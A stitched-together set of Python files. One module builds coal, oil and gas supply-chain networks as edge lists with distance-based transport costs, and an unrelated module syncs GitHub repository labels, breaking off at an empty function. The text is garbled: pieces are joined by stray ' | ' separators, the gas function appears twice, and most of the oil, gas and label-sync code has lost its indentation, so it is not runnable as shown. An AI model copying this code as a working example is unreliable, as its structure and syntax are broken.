             'df_edges_shippingroutes_shippingroutes']
    for df, name in zip(edge_dfs, names):
        # Double quotes inside the f-string keep this parseable on Python < 3.12.
        logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
    ## trim for gas
    logger.info('Trimming for gas')
    # Drop power stations whose primary fuel is not gas, plus any edges
    # that point at them; also drop edges into ports (gas uses LNG terminals).
    powerstations_nonoil = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Gas'),'unique_id'].values
    df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_nonoil)]
    df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
    df_edges_pipelines_other = df_edges_pipelines_other[~df_edges_pipelines_other['END'].isin(powerstations_nonoil)]
    df_edges_pipelines_other = df_edges_pipelines_other[~(df_edges_pipelines_other['END'].str.split('_').str[0]=='PORT')]
    df_edges_shippingroutes_other = df_edges_shippingroutes_other[~(df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT')]
    ### get ingredients
    df_ingredients = {
        'pipelines-oilfields':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILFIELD'].copy(),
        'pipelines-oilwells':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILWELL'].copy(),
        'oilfields-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILFIELD'].copy(),
        'oilwells-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILWELL'].copy(),
        'pipelines-lng':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL'].copy(),
        'pipelines-refineries':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='REFINERY'].copy(),
        'shipping-lng':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='LNGTERMINAL'].copy(),
        'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
        'pipelines-pipelines':df_edges_pipelines_pipelines.copy(),
        'pipelines-cities':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='CITY'].copy(),
        'pipelines-powerstations':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
        'lmports-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='PORT'].copy(),
        'lmcities-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='CITY'].copy(),
        'cities-lastmile':df_edges_cities.copy()
    }
    ### add impedances: distance-proportional cost (+ half a load cost for
    ### sea legs), scaled by tonnes-per-TJ.
    # NOTE(review): tperTJ['oil'] is used throughout for gas impedances —
    # confirm whether a dedicated 'gas' conversion factor was intended.
    logger.info('Adding impedances')
    df_ingredients['pipelines-oilfields']['IMPEDANCE'] = (df_ingredients['pipelines-oilfields']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-oilwells']['IMPEDANCE'] = (df_ingredients['pipelines-oilwells']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['oilfields-firstmile']['IMPEDANCE'] = (df_ingredients['oilfields-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['oilwells-firstmile']['IMPEDANCE'] = (df_ingredients['oilwells-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-lng']['IMPEDANCE'] = (df_ingredients['pipelines-lng']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-refineries']['IMPEDANCE'] = (df_ingredients['pipelines-refineries']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['shipping-lng']['IMPEDANCE'] = (df_ingredients['shipping-lng']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['oil']
    df_ingredients['shipping-shipping']['IMPEDANCE'] = (df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-pipelines']['IMPEDANCE'] = (df_ingredients['pipelines-pipelines']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-cities']['IMPEDANCE'] = (df_ingredients['pipelines-cities']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['pipelines-powerstations']['IMPEDANCE']= (df_ingredients['pipelines-powerstations']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
    df_ingredients['lmcities-powerstations']['IMPEDANCE'] = (df_ingredients['lmcities-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['lmports-powerstations']['IMPEDANCE'] = (df_ingredients['lmports-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    df_ingredients['cities-lastmile']['IMPEDANCE'] = (df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
    # Add duplicated ('_B') node columns where the recipe requires them.
    for step in recipes['gas']:
        if step['dup_1']==True:
            df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
        if step['dup_2']==True:
            df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
    ### assemble
    logger.info('assembling edge dataframe')
    all_edges = []
    for step in recipes['gas']:
        all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
    print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE']) | import logging, json, os, sys
logging.basicConfig(stream=sys.stdout, level=logging.INFO)  # log to stdout at INFO
import pandas as pd
from tqdm import tqdm
tqdm.pandas()  # enable tqdm's pandas integration (progress_apply)
# Per-fuel edge-assembly step lists consumed by the make_*_network functions.
from ffsc.flow.recipes import recipes
def get_edges(df,dup_1, dup_2, reverse):
    """Return (start, end, impedance) tuples from an edge DataFrame.

    dup_1/dup_2 select the duplicated '_B' start/end node columns, and
    reverse swaps the direction of each edge before extraction.
    """
    edges = ['START','END']
    if dup_1:
        edges[0] = 'START_B'
    if dup_2:
        edges[1] = 'END_B'
    if reverse:
        # Swap direction: emitted tuples run END -> START.
        edges = [edges[1], edges[0]]
    return df[edges+['IMPEDANCE']].to_records(index=False).tolist()
def make_coal_network(
    df_cities,
    df_powerstations,
    df_coalmines,
    df_edges_cities,
    df_edges_powerstations,
    df_edges_coalmines,
    df_edges_other_railways,
    df_edges_railways_other,
    df_edges_shippingroutes_other,
    df_edges_railways_railways,
    df_edges_shippingroutes_shippingroutes, flow_parameters):
    """Build the coal supply-chain edge list.

    Trims out non-coal power stations, prices each edge type from
    ``flow_parameters``, then assembles the edges prescribed by
    ``recipes['coal']`` into a START/END/IMPEDANCE DataFrame.
    """
    logger = logging.getLogger(f'flow_edges_coal')
    # Debug: preview every input frame.
    for df in [df_cities,
               df_powerstations,
               df_coalmines,
               df_edges_cities,
               df_edges_powerstations,
               df_edges_coalmines,
               df_edges_other_railways,
               df_edges_railways_other,
               df_edges_shippingroutes_other,
               df_edges_railways_railways,
               df_edges_shippingroutes_shippingroutes]:
        print (df.head(5))
    edge_dfs = [df_edges_cities,
                df_edges_powerstations,
                df_edges_coalmines,
                df_edges_other_railways,
                df_edges_railways_other,
                df_edges_shippingroutes_other,
                df_edges_railways_railways,
                df_edges_shippingroutes_shippingroutes]
    # NOTE(review): names has 9 entries but edge_dfs has 8 — the stray
    # 'df_edges_other_shippingroutes' entry shifts the labels for the last
    # frames in the log lines below; confirm and remove it.
    names = ['df_edges_cities',
             'df_edges_powerstations',
             'df_edges_coalmines',
             'df_edges_other_railways',
             'df_edges_railways_other',
             'df_edges_shippingroutes_other',
             'df_edges_other_shippingroutes',
             'df_edges_railways_railways',
             'df_edges_shippingroutes_shippingroutes']
    for df, name in zip(edge_dfs, names):
        logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
    ## trim for coal
    logger.info('Trimming for coal')
    # Drop power stations whose primary fuel is not coal, plus any edges
    # that point at them; also drop shipping edges to LNG/shipping nodes.
    powerstations_noncoal = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Coal'),'unique_id'].values
    df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_noncoal)]
    df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
    df_edges_railways_other = df_edges_railways_other[~df_edges_railways_other['END'].isin(powerstations_noncoal)]
    df_edges_shippingroutes_other = df_edges_shippingroutes_other[~df_edges_shippingroutes_other['END'].str.split('_').str[0].isin(['LNGTERMINAL','SHIPPINGROUTE'])]
    ### get ingredients
    df_ingredients = {
        'coalmines-railways':df_edges_other_railways.copy(),
        'coalmines-firstmile':df_edges_coalmines.copy(),
        'railways-railways':df_edges_railways_railways.copy(),
        'railways-ports':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='PORT'].copy(),
        'shipping-ports':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT'].copy(),
        'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
        'railways-powerstations':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
        'railways-cities':df_edges_railways_other[df_edges_railways_other['END'].str.split('_').str[0]=='CITY'].copy(),
        'lastmile-powerstations': df_edges_powerstations.copy(),
        'cities-lastmile':df_edges_cities.copy()
    }
    ### add impendances
    # Impedance = distance-proportional cost (+ half a load/unload cost at
    # network boundaries), scaled by tonnes-per-TJ of coal.
    logger.info('Adding impedances')
    df_ingredients['coalmines-railways']['IMPEDANCE']= (df_ingredients['coalmines-railways']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['coalmines-firstmile']['IMPEDANCE']=(df_ingredients['coalmines-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'] + flow_parameters['ROADLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['railways-railways']['IMPEDANCE']=(df_ingredients['railways-railways']['DISTANCE']/1000*flow_parameters['RAILCOST'])*flow_parameters['tperTJ']['coal']
    df_ingredients['railways-ports']['IMPEDANCE']=(df_ingredients['railways-ports']['DISTANCE']/1000*flow_parameters['RAILCOST']+ flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['shipping-ports']['IMPEDANCE']=(df_ingredients['shipping-ports']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['shipping-shipping']['IMPEDANCE']=(df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['coal']
    df_ingredients['railways-powerstations']['IMPEDANCE']=(df_ingredients['railways-powerstations']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['railways-cities']['IMPEDANCE']=(df_ingredients['railways-cities']['DISTANCE']/1000*flow_parameters['RAILCOST'] + flow_parameters['RAILLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['lastmile-powerstations']['IMPEDANCE']=(df_ingredients['lastmile-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'] + flow_parameters['ROADLOAD']/2)*flow_parameters['tperTJ']['coal']
    df_ingredients['cities-lastmile']['IMPEDANCE']=(df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['coal']
    # Add duplicated ('_B') node columns where the recipe requires them.
    for step in recipes['coal']:
        if step['dup_1']==True:
            df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
        if step['dup_2']==True:
            df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
    ### assemble
    logger.info('assembling edge dataframe')
    all_edges = []
    for step in recipes['coal']:
        all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
    print (len(all_edges))
    return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE'])
def make_oil_network(
df_cities,
df_powerstations,
df_oilfields,
df_oilwells,
df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes,
flow_parameters):
logger = logging.getLogger(f'flow_edges_oil')
edge_dfs = [df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes]
names = ['df_edges_cities',
'df_edges_powerstations',
'df_edges_oilfields',
'df_edges_oilwells',
'df_edges_other_pipelines',
'df_edges_pipelines_other',
'df_edges_pipelines_pipelines',
'df_edges_shippingroutes_other',
'df_edges_shippingroutes_shippingroutes']
for df, name in zip(edge_dfs, names):
logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
## trim for oil
logger.info('Trimming for oil')
print ('step 1')
print (df_edges_powerstations)
powerstations_nonoil = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Oil'),'unique_id'].values
df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_nonoil)]
print ('step 2')
print (df_edges_powerstations)
df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
print ('step 3')
print (df_edges_powerstations)
df_edges_pipelines_other = df_edges_pipelines_other[~df_edges_pipelines_other['END'].isin(powerstations_nonoil)]
#print (df_edges_pipelines_other)
#print (df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL')
df_edges_pipelines_other = df_edges_pipelines_other[~(df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL')]
df_edges_shippingroutes_other = df_edges_shippingroutes_other[~(df_edges_shippingroutes_other['END'].str.split('_').str[0]=='LNGTERMINAL')]
### get ingredients
df_ingredients = {
'pipelines-oilfields':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILFIELD'].copy(),
'pipelines-oilwells':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILWELL'].copy(),
'oilfields-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILFIELD'].copy(),
'oilwells-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILWELL'].copy(),
'pipelines-ports':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='PORT'].copy(),
'pipelines-refineries':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='REFINERY'].copy(),
'shipping-ports':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT'].copy(),
'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
'pipelines-pipelines':df_edges_pipelines_pipelines.copy(),
'pipelines-cities':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='CITY'].copy(),
'pipelines-powerstations':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
'lmports-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='PORT'].copy(),
'lmcities-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='CITY'].copy(),
'cities-lastmile':df_edges_cities.copy()
}
### add impendances
logger.info('Adding impedances')
df_ingredients['pipelines-oilfields']['IMPEDANCE'] = (df_ingredients['pipelines-oilfields']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-oilwells']['IMPEDANCE'] = (df_ingredients['pipelines-oilwells']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilfields-firstmile']['IMPEDANCE'] = (df_ingredients['oilfields-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilwells-firstmile']['IMPEDANCE'] = (df_ingredients['oilwells-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-ports']['IMPEDANCE'] = (df_ingredients['pipelines-ports']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-refineries']['IMPEDANCE'] = (df_ingredients['pipelines-refineries']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-ports']['IMPEDANCE'] = (df_ingredients['shipping-ports']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-shipping']['IMPEDANCE'] = (df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-pipelines']['IMPEDANCE'] = (df_ingredients['pipelines-pipelines']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-cities']['IMPEDANCE'] = (df_ingredients['pipelines-cities']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-powerstations']['IMPEDANCE']= (df_ingredients['pipelines-powerstations']['DISTANCE']/1000*flow_parameters['OIL_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmcities-powerstations']['IMPEDANCE'] = (df_ingredients['lmcities-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmports-powerstations']['IMPEDANCE'] = (df_ingredients['lmports-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['cities-lastmile']['IMPEDANCE'] = (df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
for step in recipes['oil']:
if step['dup_1']==True:
df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
if step['dup_2']==True:
df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
### assemble
logger.info('assembling edge dataframe')
all_edges = []
for step in recipes['oil']:
all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE'])
def make_gas_network(
df_cities,
df_powerstations,
df_oilfields,
df_oilwells,
df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes,
flow_parameters):
logger = logging.getLogger(f'flow_edges_Gas')
edge_dfs = [df_edges_cities,
df_edges_powerstations,
df_edges_oilfields,
df_edges_oilwells,
df_edges_other_pipelines,
df_edges_pipelines_other,
df_edges_pipelines_pipelines,
df_edges_shippingroutes_other,
df_edges_shippingroutes_shippingroutes]
names = ['df_edges_cities',
'df_edges_powerstations',
'df_edges_oilfields',
'df_edges_oilwells',
'df_edges_other_pipelines',
'df_edges_pipelines_other',
'df_edges_pipelines_pipelines',
'df_edges_shippingroutes_other',
'df_edges_shippingroutes_shippingroutes']
for df, name in zip(edge_dfs, names):
logger.info(f'{name}, {df["START"].str.split("_").str[0].unique()}, {df["END"].str.split("_").str[0].unique()}')
## trim for oil
logger.info('Trimming for gas')
powerstations_nonoil = df_powerstations.loc[~df_powerstations['features'].apply(lambda el: json.loads(el)['fuel1']=='Gas'),'unique_id'].values
df_powerstations = df_powerstations[~df_powerstations['unique_id'].isin(powerstations_nonoil)]
df_edges_powerstations = df_edges_powerstations[df_edges_powerstations['END'].isin(df_powerstations['unique_id'].values)]
df_edges_pipelines_other = df_edges_pipelines_other[~df_edges_pipelines_other['END'].isin(powerstations_nonoil)]
df_edges_pipelines_other = df_edges_pipelines_other[~(df_edges_pipelines_other['END'].str.split('_').str[0]=='PORT')]
df_edges_shippingroutes_other = df_edges_shippingroutes_other[~(df_edges_shippingroutes_other['END'].str.split('_').str[0]=='PORT')]
### get ingredients
df_ingredients = {
'pipelines-oilfields':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILFIELD'].copy(),
'pipelines-oilwells':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='OILWELL'].copy(),
'oilfields-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILFIELD'].copy(),
'oilwells-firstmile':df_edges_other_pipelines[df_edges_other_pipelines['START'].str.split('_').str[0]=='OILWELL'].copy(),
'pipelines-lng':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='LNGTERMINAL'].copy(),
'pipelines-refineries':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='REFINERY'].copy(),
'shipping-lng':df_edges_shippingroutes_other[df_edges_shippingroutes_other['END'].str.split('_').str[0]=='LNGTERMINAL'].copy(),
'shipping-shipping':df_edges_shippingroutes_shippingroutes.copy(),
'pipelines-pipelines':df_edges_pipelines_pipelines.copy(),
'pipelines-cities':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='CITY'].copy(),
'pipelines-powerstations':df_edges_pipelines_other[df_edges_pipelines_other['END'].str.split('_').str[0]=='POWERSTATION'].copy(),
'lmports-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='PORT'].copy(),
'lmcities-powerstations': df_edges_powerstations[df_edges_powerstations['START'].str.split('_').str[0]=='CITY'].copy(),
'cities-lastmile':df_edges_cities.copy()
}
### add impendances
logger.info('Adding impedances')
df_ingredients['pipelines-oilfields']['IMPEDANCE'] = (df_ingredients['pipelines-oilfields']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-oilwells']['IMPEDANCE'] = (df_ingredients['pipelines-oilwells']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilfields-firstmile']['IMPEDANCE'] = (df_ingredients['oilfields-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['oilwells-firstmile']['IMPEDANCE'] = (df_ingredients['oilwells-firstmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-lng']['IMPEDANCE'] = (df_ingredients['pipelines-lng']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-refineries']['IMPEDANCE'] = (df_ingredients['pipelines-refineries']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-lng']['IMPEDANCE'] = (df_ingredients['shipping-lng']['DISTANCE']/1000*flow_parameters['SEACOST'] + flow_parameters['SEALOAD']/2)*flow_parameters['tperTJ']['oil']
df_ingredients['shipping-shipping']['IMPEDANCE'] = (df_ingredients['shipping-shipping']['DISTANCE']/1000*flow_parameters['SEACOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-pipelines']['IMPEDANCE'] = (df_ingredients['pipelines-pipelines']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-cities']['IMPEDANCE'] = (df_ingredients['pipelines-cities']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['pipelines-powerstations']['IMPEDANCE']= (df_ingredients['pipelines-powerstations']['DISTANCE']/1000*flow_parameters['GAS_PIPELINE'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmcities-powerstations']['IMPEDANCE'] = (df_ingredients['lmcities-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['lmports-powerstations']['IMPEDANCE'] = (df_ingredients['lmports-powerstations']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
df_ingredients['cities-lastmile']['IMPEDANCE'] = (df_ingredients['cities-lastmile']['DISTANCE']/1000*flow_parameters['ROADCOST'])*flow_parameters['tperTJ']['oil']
for step in recipes['gas']:
if step['dup_1']==True:
df_ingredients[step['name']]['START_B'] = df_ingredients[step['name']]['START']+'_B'
if step['dup_2']==True:
df_ingredients[step['name']]['END_B'] = df_ingredients[step['name']]['END'] +'_B'
### assemble
logger.info('assembling edge dataframe')
all_edges = []
for step in recipes['gas']:
all_edges += get_edges(df_ingredients[step['name']], step['dup_1'], step['dup_2'], step['reverse'])
print (len(all_edges))
return pd.DataFrame(all_edges, columns=['START','END','IMPEDANCE']) |
"""Label syncing."""
import asyncio
from collections import namedtuple
import re
import traceback
import sys
from . import util
RE_VALID_COLOR = re.compile('#[a-fA-F0-9]{6}')
class LabelEdit(namedtuple('LabelEdit', ['old', 'new', 'color', 'description', 'modified'])):
"""Label Edit tuple."""
def _validate_str(name):
"""Validate name."""
if not isinstance(name, str):
raise TypeError(f"Key value is not of type 'str', type '{type(name)}' received instead")
def _validate_color(color):
"""Validate color."""
_validate_str(color)
if RE_VALID_COLOR.match(color) is None:
raise ValueError(f'{color} is not a valid color')
def _resolve_color(color, colors):
"""Parse color."""
if RE_VALID_COLOR.match(color) is None:
color = colors[color]
return color
def _parse_colors(config):
"""Get colors."""
colors = {}
for name, color in config.get('colors', {}).items():
try:
_validate_color(color)
_validate_str(name)
if name in colors:
raise ValueError(f"The name '{name}' is already present in the color list")
colors[name] = color[1:]
except Exception:
traceback.print_exc(file=sys.stdout)
return colors
def _find_label(labels, label, label_color, label_description):
"""Find label."""
edit = None
for value in labels:
name = value['name']
old_name = value.get('renamed', name)
if label.lower() != old_name.lower():
if label.lower() == name.lower():
old_name = name
else:
continue
new_name = name
color = value['color']
description = value.get('description', '')
modified = False
# Editing an existing label
if (
label.lower() == old_name.lower() and
(
label_color.lower() != color.lower() or
label_description != description or
label != old_name or
label.lower() != new_name.lower()
)
):
modified = True
edit = LabelEdit(old_name, new_name, color, description, modified=modified)
break
return edit
def _parse_labels(config):
"""Parse labels."""
labels = []
seen = set()
colors = _parse_colors(config)
for value in config.get('labels', []):
try:
name = value['name']
_validate_str(name)
value['color'] = _resolve_color(value['color'], colors)
if 'renamed' in value:
_validate_str(value['renamed'])
if 'description' in value and not isinstance(value['description'], str):
raise ValueError(f"Description for '{name}' should be of type str")
if name.lower() in seen:
raise ValueError(f"The name '{name}' is already present in the label list")
seen.add(name.lower())
labels.append(value)
except Exception:
traceback.print_exc(file=sys.stdout)
ignores = set()
for name in config.get('ignores', []):
try:
_validate_str(name)
ignores.add(name.lower())
except Exception:
pass
return labels, ignores
async def sync(event, gh, config):
"""Sync labels."""
labels, ignores = _parse_labels(config)
delete = config.get('delete_labels', False)
evaluated = set()
# No labels defined, assume this has not been configured
if not labels:
return
# Get all labels before we start modifying labels.
repo_labels = [label async for label in event.get_repo_labels(gh)]
current_names = set([value['name'].lower() for value in repo_labels])
# Iterate labels deleting or updating labels that need it.
for label in repo_labels:
edit = _find_label(labels, label['name'], label['color'], label['description'])
if edit is not None and edit.modified:
already_exists = edit.old.lower() != edit.new.lower() and edit.new.lower() in current_names
if already_exists and delete:
print(f'SYNC: Deleting {label['name']}: #{label['color']} "{label['description']}"')
await event.remove_repo_label(gh, edit.old)
current_names.remove(edit.old.lower())
await asyncio.sleep(1)
elif not already_exists:
print(f'SYNC: Updating {edit.new}: #{edit.color} "{edit.description}"')
await event.update_repo_label(gh, edit.old, edit.new, edit.color, edit.description)
current_names.remove(edit.old.lower())
current_names.add(edit.new.lower())
await asyncio.sleep(1)
else:
print(f'SYNC: Skipping {label['name']}: #{label['color']} "{label['description']}"')
evaluated.add(edit.old.lower())
evaluated.add(edit.new.lower())
else:
if edit is None and delete and label['name'].lower() not in ignores:
print(f'SYNC: Deleting {label['name']}: #{label['color']} "{label['description']}"')
await event.remove_repo_label(gh, label['name'])
current_names.remove(label['name'].lower())
await asyncio.sleep(1)
else:
print(f'SYNC: Skipping {label['name']}: #{label['color']} "{label['description']}"')
evaluated.add(label['name'].lower())
# Create any labels that need creation.
for value in labels:
name = value['name']
color = value['color']
description = value.get('description', '')
# If the name has already been evaluated, we've likely already added the name or removed it intentionally.
if name.lower() not in evaluated:
print(f'SYNC: Creating {name}: #{color} "{description}"')
await event.add_repo_label(gh, name, color, description)
await asyncio.sleep(1)
async def pending(event, gh):
